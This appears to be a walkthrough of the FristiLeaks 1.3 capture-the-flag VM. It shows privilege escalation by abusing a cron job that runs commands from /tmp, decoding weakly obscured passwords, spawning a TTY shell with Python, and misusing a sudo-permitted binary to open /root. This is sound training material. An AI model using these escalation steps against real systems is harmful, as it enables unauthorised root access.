-rw-r--r--. 1 eezeepz eezeepz  124 Sep 22  2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz  24K Nov 17  2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz  33K Nov 17  2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6.9K Nov 17  2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz  56K Nov 17  2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz  25K Nov 17  2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz  52K Nov 17  2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz  32K Nov 17  2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz  48K Nov 17  2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz  53K Nov 17  2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz  44K Nov 17  2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4.7K Nov 17  2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 127K Nov 17  2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz  38K Nov 17  2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5.3K Nov 17  2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz  41K Nov 17  2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz  15K Nov 17  2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz  44K Nov 17  2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7.8K Nov 17  2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz  17K Nov 17  2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz  33K Nov 17  2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 168K Nov 17  2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5.4K Nov 17  2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 121K Nov 17  2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz  25K Nov 17  2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4.7K Nov 17  2015 nologin
-r--r--r--. 1 eezeepz eezeepz  514 Nov 18  2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 382K Nov 17  2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 244K Nov 17  2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz  51K Nov 17  2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz  47K Nov 17  2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz  13K Nov 17  2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz  21K Nov 17  2015 true
-rwxr-xr-x. 1 eezeepz eezeepz  35K Nov 17  2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz  16K Nov 17  2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 493K Nov 17  2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz   62 Nov 17  2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz  47K Nov 17  2015 zic

There was a notes.txt so I red it:

Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

Nice! The chmod binary was present into /home/admin so I typed:

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis

After a minute I got the access to the admin folder, so I changed directory to it and I listed the files again:

-rwxr-xr-x 1 admin     admin      45224 Nov 18  2015 cat
-rwxr-xr-x 1 admin     admin      48712 Nov 18  2015 chmod
-rw-r--r-- 1 admin     admin        737 Nov 18  2015 cronjob.py
-rw-r--r-- 1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rw-r--r-- 1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxr-xr-x 1 admin     admin      90544 Nov 18  2015 df
-rwxr-xr-x 1 admin     admin      24136 Nov 18  2015 echo
-rwxr-xr-x 1 admin     admin     163600 Nov 18  2015 egrep
-rwxr-xr-x 1 admin     admin     163600 Nov 18  2015 grep
-rwxr-xr-x 1 admin     admin      85304 Nov 18  2015 ps
-rw-rw-rw- 1 apache    apache        35 Nov 23 14:32 runthis
-rw-r--r-- 1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt

There was a lot of interesting file. I printed them into the terminal, that is cryptedpass.txt:

mVGZ3O3omkJLmy2pcuTq

That is cryptpass.py

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

And then whoisyourgodnow.txt:

=RFn0AKnlMHMPIzpyuTI0ITG

Analyzing the python script I can see that the input string it’s first of all encoded in base64, then it is reversed and finally it is encoded with ROT13 algorithm. So I opened the python interpreter into my terminal and I typed:

import codecs
str = 'mVGZ3O3omkJLmy2pcuTq'
str = codecs.decode(str, 'rot13')
str = str[::-1]
str = codecs.decode(str, 'base64')
print str

That was the output:

thisisalsopw123

I made the same with the second encoded string and I got:

LetThereBeFristi!

Ok, so I tried to change user to fristigod but I received the following error:

standard in must be a tty

So I need a TTY shell. I used python to achieve this:

python -c 'import pty; pty.spawn("/bin/bash")'

Then I changed the user with:

su fristigod

And I used LetThereBeFristi! as password and it worked. Now I looked for sudo program that could be ran by the user:

sudo -l

And I discovered that:

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

Seems that there is an hidden directory with a strange binary. I changed directory to /var/fristigod and I listed the files:

-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  3 fristigod fristigod 4.0K Nov 23 14:55 .secret_admin_stuff

Let’s take a look into .bash_history:

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

Ok, seems that doCom execute command as root but I need to run it with user fristi. So I browsed into the .secret_admin_stuff directory and I typed:

sudo -u fristi ./doCom chmod -R 777 /root

I used LetThereBeFristi! as sudo password. Now I have the full access of the /root directory. I browsed into it, I listed the files and I printed to terminal fristileaks_secrets.txt:

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

VM rooted and completed!

[VULNHUB] FristiLeaks: 1.3